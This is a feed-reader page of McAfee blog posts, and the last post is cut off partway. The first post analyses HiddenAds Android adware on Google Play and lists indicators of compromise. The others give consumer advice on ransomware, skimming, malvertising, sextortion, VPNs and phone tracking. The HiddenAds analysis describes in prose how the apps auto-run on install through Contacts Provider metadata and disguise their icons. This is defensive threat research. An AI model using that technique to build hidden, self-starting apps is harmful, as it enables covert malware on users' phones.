FreshRSS

🔒
❌ About FreshRSS
There are new available articles, click to refresh the page.
Before yesterdayMcAfee Blogs

New HiddenAds malware affects 1M+ users and hides on the Google Play Store

By McAfee Labs

Authored by Dexter Shin

McAfee’s Mobile Research Team has identified new malware on the Google Play Store. Most of them are disguising themselves as cleaner apps that delete junk files or help optimize their batteries for device management. However, this malware hides and continuously show advertisements to victims. In addition, they run malicious services automatically upon installation without executing the app.

HiddenAds functions and promotion

They exist on Google Play even though they have malicious activities, so the victim can search for the following apps to optimize their device.

Figure 1. Malware on Google Play
Figure 1. Malware on Google Play

Users may generally think installing the app without executing it is safe. But you may have to change your mind because of this malware. When you install this malware on your device, it is executed without interaction and executes a malicious service.

In addition, they try to hide themselves to prevent users from noticing and deleting apps. Change their icon to a Google Play icon that users are familiar with and change its name to ‘Google Play’ or ‘Setting.’

Figure 2. Hide itself by changing icons and names
Figure 2. The Malware hides itself by changing icons and names

Automatically executed services constantly display advertisements to victims in a variety of ways.

Figure 3. A sudden display of advertisements
Figure 3. A sudden display of advertisements

These services also induce users to run an app when they install, uninstall, or update apps on their devices.

Figure 4. A button to induce users to run app

Figure 4. A button to induce users to run app
Figure 4. A button to induce users to run app

To promote these apps to new users, the malware authors created advertising pages on Facebook. Because it is the link to Google Play distributed through legitimate social media, users will download it without a doubt.

Figure 5. Advertising pages on Facebook

Figure 5. Advertising pages on Facebook
Figure 5. Advertising pages on Facebook

How it works

This malware uses the Contact Provider. The Contact Provider is the source of data you see in the device’s contacts application, and you can also access its data in your own application and transfer data between the device and online services. For this, Google provides ContactsContract class. ContactsContract is the contract between the Contacts Provider and applications. In ContactsContract, there is a class called Directory. A Directory represents a contacts corpus and is implemented as a Content Provider with its unique authority. So, developers can use it if they want to implement a custom directory. The Contact Provider can recognize that the app is using a custom directory by checking special metadata in the manifest file.

Figure 6. Content providers declared with special metadata in manifest
Figure 6. Content providers declared with special metadata in manifest

The important thing is the Contact Provider automatically interrogates newly installed or replaced packages. Thus, installing a package containing special metadata will always call the Contact Provider automatically.

The first activity defined in the application tag in the manifest file is executed as soon as you install it just by declaring the metadata. The first activity of this malware will create a permanent malicious service for displaying advertisements.

Figure 7. Create a malicious service for displaying ads
Figure 7. Create a malicious service for displaying ads

In addition, the service process will generate immediately even if it is forced to kill.

Figure 8. Malicious service process that continues to generate
Figure 8. Malicious service process that continues to generate

Next, they change their icons and names using the <activity-alias> tag to hide.

Figure 9. Using <activity-alias> tags to change app icons and names
Figure 9. Using tags to change app icons and names

Users infected worldwide

It is confirmed that users have already installed these apps from 100K to 1M+. Considering that the malware works when it is installed, the installed number is reflected as the victim’s number. According to McAfee telemetry data, this malware and its variants affect a wide range of countries, including South Korea, Japan, and Brazil:

Figure 10. Top affected countries include South Korea, Japan, and Brazil
Figure 10. Top affected countries include South Korea, Japan, and Brazil

Conclusion

This malware is auto-starting malware, so as soon as the users download it from Google Play, they are infected immediately. And it is still constantly developing variants that are published by different developer accounts. Therefore, it is not easy for users to notice this type of malware.

We already disclosed this threat to Google and all reported applications were removed from the Play Store. Also, McAfee Mobile Security detects this threat as Android/HiddenAds and protects you from this type of malware. For more information about McAfee Mobile Security, visit https://www.mcafeemobilesecurity.com

Indicators of Compromise

Applications:

App Name Package Name Downloads
Junk Cleaner cn.junk.clean.plp 1M+
EasyCleaner com.easy.clean.ipz 100K+
Power Doctor com.power.doctor.mnb 500K+
Super Clean com.super.clean.zaz 500K+
Full Clean -Clean Cache org.stemp.fll.clean 1M+
Fingertip Cleaner com.fingertip.clean.cvb 500K+
Quick Cleaner org.qck.cle.oyo 1M+
Keep Clean org.clean.sys.lunch 1M+
Windy Clean in.phone.clean.www 500K+
Carpet Clean og.crp.cln.zda 100K+
Cool Clean syn.clean.cool.zbc 500K+
Strong Clean in.memory.sys.clean 500K+
Meteor Clean org.ssl.wind.clean 100K+

 

SHA256:

  • 4b9a5de6f8d919a6c534bc8595826b9948e555b12bc0e12bbcf0099069e7df90
  • 4d8472f0f60d433ffa8e90cc42f642dcb6509166cfff94472a3c1d7dcc814227
  • 5ca2004cfd2b3080ac4958185323573a391dafa75f77246a00f7d0f3b42a4ca3
  • 5f54177a293f9678797e831e76fd0336b0c3a4154dd0b2175f46c5a6f5782e24
  • 7a502695e1cab885aee1a452cd29ce67bb1a92b37eed53d4f2f77de0ab93df9b
  • 64d8bd033b4fc7e4f7fd747b2e35bce83527aa5d6396aab49c37f1ac238af4bd
  • 97bd1c98ddf5b59a765ba662d72e933baab0a3310c4cdbc50791a9fe9881c775
  • 268a98f359f2d56497be63a31b172bfbdc599316fb7dec086a937765af42176f
  • 690d658acb9022765e1cf034306a1547847ca4adc0d48ac8a9bbdf1e6351c0f7
  • 75259246f2b9f2d5b1da9e35cab254f71d82169809e5793ee9c0523f6fc19e4b
  • a5cbead4c9868f83dd9b4dc49ca6baedffc841772e081a4334efc005d3a87314
  • c75f99732d4e4a3ec8c19674e99d14722d8909c82830cd5ad399ce6695856666

Domains:

  • http[://]hw.sdk.functionads.com:8100

The post New HiddenAds malware affects 1M+ users and hides on the Google Play Store appeared first on McAfee Blog.

What Are Ransomware Attacks? An In-Depth Guide

By McAfee

We all love to spend time surfing the web — whether we’re shopping, paying bills, or reacting to funny memes. The internet has also allowed many of us to keep working from home even during the pandemic.  

The internet is great, but the best way to keep enjoying it is to know where and how bad actors can pop up in our computer systems. 

One way is through the use of ransomware, which is a type of malware that threatens users with blocked access or doxing (exposing personal information) if they don’t pay money to the cybercriminals who sent the malicious software.  

We’ll explain what ransomware is, how it works, and how to defend against it so you can stay one step ahead and continue enjoying life online. 

What is ransomware?

Ransomware is malware that uses encryption to hold your information at ransom. This might mean you can’t access critical data in files, databases, or applications. The cybercriminal will then usually demand a ransom to provide access.  

Often, ransomware includes a deadline to add a sense of urgency to the threat. Typical ransomware attacks might suggest that your data will be lost or published on the web for the world to see if you don’t pay. Ransom demands generally ask for payment in Bitcoin or some other form of cryptocurrency, where transactions are less regulated and traceable. 

Unfortunately, ransomware is often designed to spread across a network and target database and file servers — quickly paralyzing an entire organization. Ransomware attacks represent a growing problem, generating billions of dollars in payments to cybercriminals and inflicting damage and expenses for businesses and governmental organizations.  

However, if you have a basic understanding of how ransomware works, you can take steps to protect yourself. 

How does ransomware work?

Ransomware uses asymmetric encryption, which uses a mixture of symmetric and asymmetric encryption methods to make it more difficult to decrypt ransomed data files. Put simply, cybercriminals using asymmetric encryption generate a public key to encrypt files and a separate but private key to decrypt the same files. As a result, the victim has to rely on the hacker for the decryption key — for a price, of course — because the private key to decrypt the files is stored on the attacker’s server.  

The attacker then makes the private key available to the victim only after the ransom is paid, although this isn’t always the case, as seen in recent ransomware campaigns. Without access to the private key, it can be difficult to decrypt the files being held for ransom. 

Many forms of ransomware exist. Often, ransomware (and other malware) is distributed using email spam campaigns or through targeted attacks. Malware needs an attack vector, which is how a cybercriminal gains access to a device to deliver malicious software. This might take the form of an email attachment, webpage, pop-up window, or even instant message. After malware establishes its presence, though, it’ll stay on the system until it finishes its task. 

After a successful exploit, ransomware drops and executes a malicious binary on the infected system. This binary then searches and encrypts valuable files, such as Microsoft Word documents, images, databases, and so on. The ransomware may also exploit system and network vulnerabilities to spread to other systems and possibly across entire organizations. 

Once files are encrypted, ransomware prompts the user for a ransom to be paid within 24 to 48 hours to decrypt the files, or they’ll be lost forever. If a data backup is unavailable or those backups are encrypted, the victim might have to pay the ransom to recover their personal files. 

Examples of ransomware attacks

Cyberattacks, including different types of ransomware, occur and evolve all the time, but there are several ways to avoid them. 

It all starts with looking to the past to protect your sensitive data in the future. In the next few sections, we’ll cover how hackers have engaged in extortion across computer systems over the years. 

CryptoLocker

CryptoLocker was one of the earliest adopters of this type of malware — demanding a ransom payment in cryptocurrency for a user to get their data back. In fact, it was probably the first time many people had heard the term “ransomware.” 

In 2013, CryptoLocker attacked through an email attachment that looked like the tracking notifications of shipping companies like UPS and FedEx. It resulted in more than 250,000 infected computer systems and up to $27 million in extorted money. 

Although a decryption key has existed for CryptoLocker since 2014, it can still cause problems for users who may not recognize the presence of the ransomware before opening the attachment. 

WannaCry

In 2017, Wannacry took the “worm” approach to ransomware, spreading across Windows PCs through shared networks. At the time, the ransomware turned everything on the computer into encrypted data, with the hackers threatening not to return the data until the ransom was paid (in this case, cryptocurrency). Estimates point to over 200,000 computers being infected around the world.  

A killswitch was created to help operating systems infected with WannaCry, but the hacking group is still out there posing new threats. 

Kaseya

The Kaseya ransomware attacks occurred on July 2, 2021, and led to an FBI response because this represented a global cybercrime event. In this instance, though, the ransomware group REvil made damaging use of vulnerabilities found in the on-premises software of Kaseya VSA. The hackers then demanded $70 million in Bitcoin. 

The company managed many service providers, so the attack affected all of the downstream customers of those service providers. In fact, the malware attack may have affected around 1,500 organizations across the world.  

The good news is that patches have now been developed for affected servers. 

JBS

You might not immediately think of the world’s largest meat supplier as being one of the victims of ransomware, but that’s exactly what happened to JBS Foods.  

Threatening to disrupt the food supply chain in May 2021, organized cybersecurity attacks by REvil targeted JBS’s North American and Australian plants, encrypting data that was then ransomed for over $11 million worth of Bitcoin by the company.  

Colonial Pipeline

On May 7, 2021, hackers made malicious use of a single leaked password belonging to a virtual private network (VPN) account associated with the Colonial Pipeline Company.  

Even though the breached account had been dormant for some time, it was still successfully used as an entry point to the Colonial network. The password to this account was linked to a batch of compromised passwords on the dark web, leading officials to believe it could have been an employee who re-used the same password for other accounts.  

 

This major cybersecurity event showcases the ways that ransomware can set up camp inside computer systems without the use of phishing. 

How to defend against ransomware

Being proactive is one of the best things you can do to safeguard against ransomware attacks. This means thinking ahead to what vulnerabilities may exist in your current computer network setup and addressing them before they’re used for cyber extortion.  

There are several ways you can help reduce your exposure to cybercriminals by simply being alert to where they usually get in. The following sections offer information on how to set up the best possible defense against ransomware. 

Back up your data

The best way to avoid the threat of being locked out of your critical files is to ensure that you always have backup copies of them, preferably in the cloud and on an external hard drive. This way, if you do get a ransomware infection, you can wipe your computer or device free and reinstall your files from backup. This protects your data, and you won’t be tempted to reward the malware authors by paying a ransom. Backups won’t prevent ransomware but they can help mitigate the risks. 

Secure your backups

Make sure your backup data isn’t accessible for modification or deletion from the systems where the data resides. Ransomware will look for data backups and encrypt or delete them so they can’t be recovered, so it’s important to use backup systems that don’t allow direct access to backup files. 

Use security software and keep it up to date

Make sure all of your computers and devices are protected with comprehensive security software and keep all of your software up to date. Make sure you update your devices’ software early and often, as patches for flaws are typically included in each update.

Practice safe surfing

Be careful where you click. Don’t respond to emails and text messages from people you don’t know and only download applications from trusted sources. This is important since malware authors often use social engineering to try to get you to install dangerous files.[Text Wrapping Break] 

Only use secure networks

Avoid using public Wi-Fi networks since many of them aren’t secure and cybercriminals can snoop on your internet usage. Instead, consider installing a VPN like McAfee Secure VPN, which provides you with a secure connection to the internet no matter where you go.[Text Wrapping Break] 

Stay informed

Keep current on the latest ransomware threats so you know what to look out for. In the case that you do get a ransomware infection and haven’t backed up all of your files, know that some decryption tools are made available by tech companies to help victims. 

What to do if you’re the victim of a ransomware attack

Ransomware attacks don’t have to spell disaster if you catch them in time and know what to do. If you suspect you’ve been hit with a ransomware attack, it’s important to act quickly.  

Fortunately, there are several steps you can take to address ransomware issues quickly and have your computer systems return to business as usual in no time. 

  1. Isolate the infected device. Many antimalware programs start by discovering where the ransomware has made its home. This might be on a single device within your network or on many devices. Whatever the case, separating infected computers and other devices from the primary network and any other avenues to your sensitive data should be step one.
  2. Assess the damages. Understanding what the ransomware on your computer has had access to is the next step. Is it just your password-protected online accounts, or have your financial and health care records also been involved? Sometimes, the extent of the damage is immediately obvious. Other times, as with many phishing emails, you’ll be able to see that only certain aspects of your private information have been hijacked.
  3. Identify the ransomware. Finding out who and what has actually breached your privacy is crucial. Well-known hacker groups like REvil and Darkside often restrict their attacks to giant corporations, but the advent of things like ransomware as a service (RaaS) means that bad actors can and will target anyone now.
  4. Report the ransomware to authorities. Whether you discover that you have been hit by a somewhat vintage ransomware group like Petya or a more sophisticated modern program like Ryuk, always report your ransomware experience to law enforcement. The main reason for this is to help officials continue to develop decryptor systems until there’s no more ransom software to worry about. The secondary reason is so you aren’t seen as complicit with the actions of any hacker group that has targeted your information.
  5. Evaluate your backups. Lastly, take a good look at your storage and backup systems once you’re through the first hassles of a ransomware attack. Make sure that any external hard drives or cloud storage spaces have remained clean. If these safe spaces still exist, you can usually use them to help restore most of your sensitive data. 

Get a personalized protection plan

We’ve all spent more time online recently in the wake of the pandemic, and no one needs cybersecurity issues on their plates during this or any other time. The good news is that antivirus software is evolving rapidly and there are plenty of steps you can take to shield your computer systems from needless attacks like ransomware. 

One surefire way to get peace of mind against hacker groups is to put your trust in the expert care of Total Protection services from McAfee. All of our plans come with a private VPN, antivirus protection, and safe-browsing features. This means you can live your connected life free from threats like ransomware, malware, and more.  

With multiple affordable plans, there’s a McAfee protection plan for every person. It’s a small price to pay for staying one step ahead of ransomware attacks.  

The post What Are Ransomware Attacks? An In-Depth Guide appeared first on McAfee Blog.

What is ATM Skimming?

By McAfee

Ever hear of a crime called skimming? It may not be as dramatic a crime as assault or Ponzi schemes, but it can cause significant problems to you as your  savings account can be wiped out in a flash.

Picture a scrawny nerd tampering with an automated teller machine (ATM)—the machine you use with your debit card to get cash. The thief places a device over the slot through which you slide your debit card. You have no idea it’s there. You swipe your card, and the device “skims” or reads your card’s information. In the middle of the night, the thief creeps back, removes the skimming device, downloads your data, burns it to a blank ATM card, makes a fat withdrawal and goes home with the loot. Or they could download your information from the skimmer and then use your information to make online purchases or access your account. Either way, they could clean you out before you wake up next morning!

Now, to be successful, the criminal not only needs a skimming device, they also need to attach a tiny wireless camera to capture your PIN.  These cameras are usually concealed in the lighting fixture above the keypad, in a brochure near the machine, or attached directly to the ATM.

To protect yourself from being skimmed, and generally staying safe when using your debit or credit cards, follow these tips:

  • Scrutinize the ATM. This means every ATM, even ones from your bank. You also want to check any of the card sliders like ones at gas stations, etc, especially if you’re using your debit card. If the scanner does not match the color and style of the machine, it might be a skimmer. You should also “shake”  the card scanner to see if it feels like there’s something  attached to the card reader on the ATM.
  • Cover the keypad when entering your PIN. In order to access your bank accounts, thieves need to have your card number and your PIN. By covering the keypad, you prevent cameras and onlookers from seeing your PIN.
  • Check your bank and credit card statements often. If someone does get your information, you have 60 days to report any fraudulent charges to your credit card company in order not to be charged. For a debit card, you only have about 2 days to report any suspicious activity.
  • Be choosy. Don’t use general ATMs at bars or restaurants. These are not usually monitored and therefore, can be easily tampered with by anyone.

Stay safe from skimming!

The post What is ATM Skimming? appeared first on McAfee Blog.

What Is Malvertising and How Do You Avoid It?

By McAfee

Smartphones and personal computers have enhanced our lives in so many ways that it can be hard to even imagine a world without them. The internet is an awesome place with endless opportunities and possibilities, but it’s also home to some seedy characters that can expose us to certain risks, like malvertising. 

Malvertising, which is short for malicious advertising, attacks and compromises systems by spreading advertisements injected with malicious code. Legitimate advertising networks can then display these malicious advertisements without even knowing they’re infected.  

In this article, we’ll take a closer look at what malvertising is and what you can do to secure your data and keep your information safe online. We’ll also provide some examples so you can fully understand how malvertising might be used.  

Having a thorough understanding of malvertising is the first step toward keeping the internet a safe place for you and your family. 

How does malvertising affect you online?

Since malvertising disguises malicious code inside legitimate online advertising, ad networks may find it hard to stop malvertising from appearing as legitimate ads.  

Viewing malvertisements can put your personal information at risk, such as your identification information, contact details, and financial data. It can also alter or delete your information, hijack your computer functions, spy on your computer activities, and steal your data. And this all can happen without your knowledge.  

The type of risk, though, depends on the programs that the malvertising successfully downloads onto your device. These programs can include: 

  • Malware: This includes any malicious program that can harm your device or steal your information. 
  • Ransomware: Ransomware is exactly what it sounds like. It encrypts your files or locks your devices and requires you to pay a ransom to use them again. Cybercriminals generally require the ransom to be in cryptocurrency because it is untraceable.  
  • Spyware: This is a type of malware that spies on your online activities without your knowledge. Spyware puts your device’s security at risk and violates your privacy.  
  • Adware: Adware is short for advertising-supported software and hides on your device while serving you pop-up ads. This can slow down your device and install spyware or viruses on it.  
  • Viruses: A virus is a computer program that replicates itself onto computer programs and is designed to steal data or damage the device.  

Examples of malvertising 

Cybercriminals use various methods to inject infected code into online ads. Below are some examples of the types of malvertising that can pose a risk to your cybersecurity and exploit vulnerabilities on your devices. 

  • Ad creative containing malware: Text or banner ads can contain embedded malware. The infected ads — even if they’re display ads that aren’t clicked on — can put all of the devices that displayed the ad at risk for scams or malicious software.  
  • Ad calls containing malicious code: A cybercriminal can add infected code to an ad payload and infect any devices that display the ad.  
  • Video containing malware: Video players are vulnerable to malware since they don’t have any protection against it. Videos can display malicious links and, consequently, infect your device.  
  • Compromised URLs: Whenever a user clicks on an ad, it directs them between several URLs that eventually lead them to a landing page. If any of these URLs get infected with malicious code, the user’s computer can be at risk of a cyberattack.  
  • Landing page with a malware-infected element: Legitimate websites can also contain elements infected with malware. When you click on an ad and get directed to a legitimate landing page, your device can still be infected by a malicious element on the page.  
  • Pixel containing malware: Cybercriminals can intercept the delivery path of a pixel and send malicious code to your browser.  
  • Flash video containing malware: Flash files can load a pre-roll banner injected with malicious code. This can infect your device once it gets exposed to it without you having to click on the video.  

Even highly reputable and popular websites, such as The New York Times, the BBC, Spotify, and AOL, have been targeted in the past by malicious ads, putting billions of visitors at risk. Any website can become a target.  

What’s the difference between malvertising and adware?

Malvertising is often confused with ad malware. Both are forms of malware and involve infected advertisements, but they’re fundamentally different.  

Malvertising uses malicious code that can cause harm to anyone viewing the infected advertisement, while adware is used to target individuals by forcing ads onto their devices to generate clicks. Users can get bombarded with pop-up ads, which can affect their devices. Adware also collects browsing information to sell to advertisers. This is often referred to as browser hijacking. 

How to avoid malvertising as a web user

Taking the necessary steps to protect your online activities and personal identifying information can help shield you from malvertising attacks. Massive volumes of online ads are displayed every day, so it’s never been more important to safeguard yourself against any shady activity on the internet.  

Taking a few steps can help you avoid malvertising and minimize your risk of identity theft.  

  • Take advantage of identity protection software like McAfee. We can help you stay protected against cybercrime with identity monitoring and identity restoration services (in the event of identity theft).  
  • Always ensure that your ad blocker and antivirus software are up to date. These can help reduce the risk of malvertising. Keep in mind that outdated software becomes less effective with time.  
  • Don’t use Java or Flash. The Flash player is vulnerable to cyberthreats since it’s an outdated plugin. Java is another plugin that allows software to be executed within your browser and carries a high risk of being abused to circumvent security measures on your device. You can disable the plugins or uninstall them entirely.  

Keep your information secure online with McAfee

With so much sensitive information being shared online, it’s never been more important to take the necessary steps to help keep your data and privacy safe.  

McAfee Total Protection services can help increase cybersecurity on your devices and keep your identity private from hackers. We offer all-in-one protection so you can get the peace of mind you deserve while enjoying the internet. 

All products include identity monitoring, automated privacy using a virtual private network (VPN), a password manager, a firewall, and much more. We also offer identity restoration assistance and up to $1 million in identity theft coverage to help relieve the burden of data breaches.  

Get comprehensive identity protection from McAfee and get back to surfing the internet with confidence.  

The post What Is Malvertising and How Do You Avoid It? appeared first on McAfee Blog.

Sextortion: What Your Kids Need to Know

By Toni Birdsong

Sextortion is something no parent wants to think could happen to their child, nor a topic most of us would ever imagine we’d need to discuss in our homes. However, according to the latest FBI reports, sextortion is a digital threat to children that, woefully, is on the rise.

According to the FBI, there has been a considerable increase lately in sextortion cases involving children and teens being coerced by adults online.

What is sextortion?

A sextortion scenario can emerge in several ways. Most often, it occurs when an adult (posing as a peer) engages in casual conversation with an underage child, gains their trust through online conversation, then pressures or threatens the child into sharing sexual photos or videos of themselves.

Random contacts

In some cases, the initial contact with the criminal will be a threat. The person may claim to already have a revealing picture or video of a child that they threaten to share if the victim does not send more pictures.

Known contacts

According to the FBI, this crime more often starts when young people believe they are communicating with someone their age who is interested in a relationship or with someone who is offering something of value. This catfish (false profile) relationship usually involves the predator using gifts, money, flattery, lies, or other methods to get a young person to produce an image.

How does sextortion begin?

These dangerous conversations can be initiated through text, a social or chat app, a gaming site, or any number of digital connection points.

After a criminal successfully obtains a photo or video from their victim, the threats can escalate to promises to publish the content or even hurt the child if they don’t send more. This emotionally harrowing situation can ignite shame, fear, and confusion in children who may be too embarrassed to ask for help or report the abuse.

While these criminals rarely request to meet their victims face-to-face, the emotional and physical impact of sextortion can be devastating to a child. According to the FBI, some victims report abusers who become vicious with non-stop harassment and threats. Victims can feel scared, alone, embarrassed, and increasingly desperate. Sadly, as reported in the news, this type of crime can leave some children feeling like they have no way out of the situation.

What can families do?

Talk about the reality of sextortion.

If you are a parent or caregiver, explain to your child how sextortion can happen to anyone online and why it’s important to only connect with known friends and family. Parents: Consider boosting your device security with parental controls that filter content, report your child’s online activity, and reveal potential problems.

Master and repeat the basics.

Some essential safety protocols kids should follow online are worthy of repeating. They are:

1) Make social accounts private, don’t share personal information, and only connect with known friends

2) Ignore and block messages from strangers

3) Keep your guard up. People can pretend to be anyone online, and photos can be altered

4) Be suspect if anyone asks you to message or text with them privately

5) Never share risky photos with anyone online—even a trusted friend

6) Tell someone immediately if someone is threatening you online.

Audit all digital connections.

With your child, go through their apps, social networks, chats, gaming communities, and friend groups and do some editing, defriending, and blocking. Make sure both you and your child know and trust all their online connections. Remember: Open communication and an honest relationship with your child are the most powerful tools you have to keep your child safe online.

Be clear to remove any fault.

A sextortion situation for a child can be incredibly confusing and cause them to isolate and avoid telling anyone about it. Remind and be clear with your child that they would never be in trouble for coming to you with any problem. Let them know that sextortion is a crime for the perpetrator and that they have not broken any laws by sending photos (despite what an abuser might have told them).

Report the crime.

Victims of sextortion should go to a parent or trusted adult and tell them they need help. While doing this can feel terrifying, it’s crucial for victims to know people understand and want to help. For parents and caregivers, contact the FBI at 1-800-CALL-FBI or report the crime online at tips.fbi.gov.

While the bad actors online are out to exploit and ruin our digital spaces, it’s important to maintain a healthy perspective rather than responding with fear. Remind your kids that there’s an army of people even more dedicated than the criminals; people like the FBI who are out to stop online crime and keep the internet safe for families. Additionally, as a parent or caregiver, your commitment to helping your family stay informed, equipped, and empowered online is how we all win.

The post Sextortion: What Your Kids Need to Know appeared first on McAfee Blog.

Kicking off my Second Career: Gayatri’s McAfee Journey

By Life at McAfee

Our How I Got Here series spotlights the stories of team members who have successfully grown their career here at McAfee. This journey features Gayatri who kicked off her second career at McAfee after leaving her role and returning to further education.

My McAfee Career Journey

McAfee truly kicked off my second career journey! I previously worked as a Software Engineer before I joined the McAfee Pre-sales Operations team as a summer intern as part of my business graduate program. One thing led to another, and I joined McAfee full-time as a Technical Project Analyst after I graduated later that year!

I’ve always believed in having a growth mindset, I embrace learning and looking for ways to build on my achievements. I’m proud to be part of an organization that nurtures this and helps you pursue your passions. For example, in 2019 I moved from a team focused on products and services for large businesses to a team focused on individual consumers. The needs of consumers versus big businesses are very different, so the business operations work supporting that focus are very different as well. It was a steep learning curve, but I felt supported every step of the way, and since then have grown so much!

Getting outside my comfort zone

Back in 2011, I was a software engineer spending my days doing programming and web development. While I was happy doing that, it was after working on many client-facing projects that I aspired to work at the intersection of business and technology. So, I left engineering and went to business school.

Taking a break from my full-time job to pursue formal business education in a new country was a big step outside my comfort zone. It was challenging to find balance, but the journey was worth it!

Teaming together to see the bigger picture

Today, I am a Sales Enablement and Operations Manager supporting sales teams all over the world. My focus areas include managing platforms and tools like Salesforce, Power BI, and SharePoint Sales Portal, as well as our department’s training and enablement programs – in other words, technology and professional development that help our team members be successful. Plus, I’m a key team member for an array of programs and projects that are pushing the business forward.​​​​​​​​

My work is highly collaborative, and I really enjoy working on projects with colleagues across different departments all over the world. I get to see the bigger picture, better understand the business context, and see the WHY behind the initiatives we drive.​​​​​​​​​​​​​​​​​​​​​

From business projects to being a part of the McAfee WISE (Women in Security) Board, it’s the people, culture, and opportunity that sets McAfee apart. I love working with the amazing people at McAfee!

Underlying it all: Working at McAfee matters because ultimately what we do helps protect lives of millions of people online.

My advice for anyone looking to drive their career forward is:

I have come to realize that the pain of staying the same is greater than the pain of changing and growing. Develop a growth mindset to keep moving forward!

The post Kicking off my Second Career: Gayatri’s McAfee Journey appeared first on McAfee Blog.

How to Set Up a VPN on an Android in 2022

By McAfee

There’s no denying that the internet fills a big part of our days. Whether playing, working, or studying, we rely on staying connected. But just as there’s a lot of good that comes with the internet, it can also make us susceptible to cybercriminals.  

This is especially true if you’re using your phone on public Wi-Fi. Anyone with access to the public network can see your online activity, including hackers 

Fortunately, by keeping your personal information and data secure, you can continue to live your best life online. Advanced security and privacy tools like virtual private networks (VPNs) can shield your identity online, allowing you to browse online without worrying about hackers. 

In this article, we’ll show you how to set up a VPN on your Android device manually or use a VPN app like McAfee’s Safe Connect VPN 

Why you should use a VPN on your Android device

Using a VPN with your Android phone can be a smart move that allows you to live a fully connected life without risking catching the eyes of cybercriminals. 

A VPN essentially hides your online presence and encrypts your information so that no one can steal sensitive data, like credit card details and passwords. It maximizes privacy and safety by sending your encrypted information through a tunnel to VPN servers in various locations globally. It’s so effective that not even your internet provider, search engine, or other third parties can take a peek at your data. 

If you like video streaming on your smartphone but often run into geo-restricted content, you’ll also find a VPN useful. It changes your IP address, allowing you to access blocked content on platforms like YouTube and Netflix. 

Does Android have a built-in VPN?

If you have an Android smartphone, you can use its built-in VPN client or legacy VPN. The integrated VPN uses several protocol suites, including PPTP, L2TP, and IPSec, to deliver a secure internet connection. 

However, you’ll have to configure the built-in VPN manually, which can be hard. So, if you’re not that tech-savvy, a VPN app can be a good option. McAfee Security for Mobile is one such app available on the Google Play Store. 

You might also want to opt for an app when:  

  • Setting up a VPN through an enterprise mobility management (EMM) platform 
  • Establishing a different VPN connection for your work profile or personal stuff through VPN settings 
  • Increasing your connection options by using VPN protocols not supported by the client 

How to set up a VPN on Android

Depending on your connection requirements and tech skills, we’ll walk you through how to set up your VPN manually or through an app. 

How to manually set up an Android VPN 

Setting up a VPN manually by adjusting the VPN settings is one way to get the job done. This approach allows you to connect your device to a VPN server by entering configuration details. 

You can set up the VPN manually via the user interface (UI) on your Android phone. The UI plays a big role in setting up and controlling the VPN solution. When the VPN is active, your mobile device system notifies you through the home screen. 

To get your VPN up and running on your Android operating system, you’ll need to find the “Settings” menu on your device. 

  1. Once you reach the “Settings” menu, select “Wireless & Networks” or “Wi-Fi & Internet.” 
  2. From there, select “VPN” (depending on your device, you may first need to tap “More”). 
  3. Next, find the “+” sign at the top right corner of your screen or go to the “Advanced Options” menu via the three vertical dots icon. 
  4. Finally, enter your VPN’s configuration details like username, server address, and password. The VPN provider will typically provide this information.  

How to set up an Android VPN using an app

If you want to set up a VPN quickly and easily, your best bet is to install a VPN app on your mobile device. For instance, you can simply download McAfee’s Mobile Security app from the Google Play Store and register an account, allowing you to log in and start enjoying full protection. 

Once you choose a VPN provider and sign up for a subscription plan (if paid), you’re ready to set up your VPN using the Android app. While the setup process can differ slightly depending on the VPN, here’s the process for setting up McAfee’s Safe Connect VPN app: 

  1. First, download and install the VPN app from the Google Play Store. 
  2. Launch the app. 
  3. Accept the Privacy Notice and License Agreement. 
  4. On the next screen, you’ll be asked to activate a free seven-day trial (no credit card required) or continue with a free account (250 MB data
  5. protection limit). 
  6. Next, select the ideal VPN server in a location that suits your connection needs. 
  7. Activate your VPN by tapping the blue “Start Protection” button or turn on “Safe Connect” using a slider located on your phone’s notifications area.  
  8. Lastly, agree to the connection request by tapping “Ok” on the dialog box that appears. And, voila, your McAfee VPN for Mobile is active. 

Keep your Android secure with McAfee Security for Mobile

Now that you know about various steps to install a VPN on an Android device, consider investing in the award-winning McAfee Mobile Security App. This service comes with useful security tools for browsing the net on mobile devices and privacy protection for your Wi-Fi network. You can count on the award-winning software to secure your phone and the data it sends over the internet. 

In addition to keeping your connection private, the software detects unwanted visitors and malicious apps. McAfee Mobile Security integrates an antivirus VPN that scans your device for cyberthreats and neutralizes them. The software delivers robust protection against evolving threats and gives you peace of mind. 

Start protecting your digital life and securing your network traffic by signing up for McAfee Security for Mobile today. 

The post How to Set Up a VPN on an Android in 2022 appeared first on McAfee Blog.

Can My Phone Be Tracked If Location Services Are Off?

By McAfee

Your smartphone comes with built-in location services, which are useful if you lose it or if you use an app that needs to know your location. But what if you don’t want your phone to be tracked? Can the phone be located if you turn off location services? The answer is yes, it’s possible to track mobile phones even if location services are turned off. 

Turning off the location service on your phone can help conceal your location. This is important if you don’t want third parties knowing where you are or being able to track your movement. However, a smartphone can still be tracked through other techniques that reveal its general location.  

This article explains how your phone can be tracked and what you can do to enhance your mobile security. 

How can a phone be tracked?

Whether you have an iOS or Android phone, there are ways it can be tracked even if location services are turned off. You may have used some of these yourself to find a lost or stolen phone. For example, the Find My iPhone app uses Bluetooth to help you find an iPhone even if it’s offline. 

If you have an Android phone and the Find My Device app, you can log in to your Google account and use Google Maps to check your phone’s location history 

 Here are four ways that your phone could be tracked: 

Cell towers 

The United States has more than 307,000 cell towers. When you use your phone, signals travel back and forth to the nearest cell tower. Cell carriers can calculate the general area of your phone by measuring the time it takes for a signal to travel back and forth.  

Carriers use cell tower triangulation for a more accurate reading, which combines location data from three cell towers. This technology was developed to help 911 operators locate callers. It pinpoints the phone’s location within a 300-meter area 

Public Wi-Fi

A smartphone that has Wi-Fi enabled communicates with nearby Wi-Fi networks even if it’s not connected to one. Your device automatically scans Wi-Fi access points nearby and notes the signal strength.  

When using public Wi-Fi, the provider commonly asks you to agree to location tracking. That Wi-Fi provider will then record your location whenever you’re in range of one of its hot spots. 

To use public Wi-Fi while protecting your privacy, it’s a good idea to connect with a VPN like McAfee’s Safe Connect VPN. This software protects your data using bank-grade encryption to keep your online activity private. The VPN also keeps your IP address and physical location private. 

Cell site simulators

Cell site simulators — otherwise known as stingrays— mimic cellphone towers. They trick your phone into pinging it, transmitting its location, and identifying information. Stingrays cause cellphones to connect to them rather than to legitimate cell towers by transmitting a stronger signal than that from the cell towers.  

Law enforcement officers often use stingrays to locate and track the movement of potential suspects. While attempting to connect to a specific individual, stingrays connect data from all phones in the vicinity of the device. 

Malware or spyware

